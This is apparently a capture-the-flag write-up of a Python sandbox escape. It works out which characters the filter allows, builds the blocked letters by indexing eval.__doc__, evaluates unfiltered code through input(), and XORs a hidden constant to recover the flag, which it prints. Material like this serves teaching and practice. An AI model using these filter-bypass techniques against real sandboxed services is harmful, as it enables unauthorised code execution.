After connecting to the server, we quickly notices lot of chars are filtered

So i typed all of printable chars to get the blacklisted and whitelisted chars:

```
>>> a = 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
4
5
6
8
b
f
h
j
k
m
q
u
w
x
y
z
b
f
h
j
k
m
q
u
w
x
y
z
!
#
$
%
&
*
,
-
/
:
;
<
=
>
?
@
\
^
`
{
|
}
~
Denied
```

From this we extract the white listed chars:

```
012379acdegilnoprstv"'()+.[]_
```

First i wanted to print `__builtins__` but `b` and `u` are blacklisted,
so i replaced `b` with `eval.__doc__[37+9+1]`
and `u` with `eval.__doc__[3+1]`

```
>>> a = eval("print(__"+eval.__doc__[37+9+1]+eval.__doc__[3+1]+"iltins__.__dict__)")
{'repr': <built-in function repr>, 'str': <class 'str'>, 'print': <built-in function print>, 'eval': <built-in function eval>, 'input': <built-in function input>, 'any': <built-in function any>, 'exec': <built-in function exec>, 'all': <built-in function all>, 'Exception': <class 'Exception'>}
```

I quickly noticed that `input` is allowed, let's use it:

```
>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
ALLES()
No flag for you!
```

Let's inspect the function ALLES

```
>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
ALLES.__code__.co_consts
(None, 'p\x7f\x7frbH\x00DR\x07CRUlJ\x07DlRe\x02N', 'No flag for you!')

>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
ALLES.__code__.co_names
('string_xor',)
```

there is a non printable constant, and a probably a function called "string_xor"
we can try to xor 'p\x7f\x7frbH\x00DR\x07CRUlJ\x07DlRe\x02N' with ALLES{

```
>>> from pwn import xor
>>> xor('p\x7f\x7frbH\x00DR\x07CRUlJ\x07DlRe\x02N','ALLES{')
b'133713A\x08\x1eB\x10)\x14 \x06B\x17\x17\x13)N\x0b'
>>> xor('p\x7f\x7frbH\x00DR\x07CRUlJ\x07DlRe\x02N','1337')
b'ALLES{3sc4ped_y0u_aR3}'
```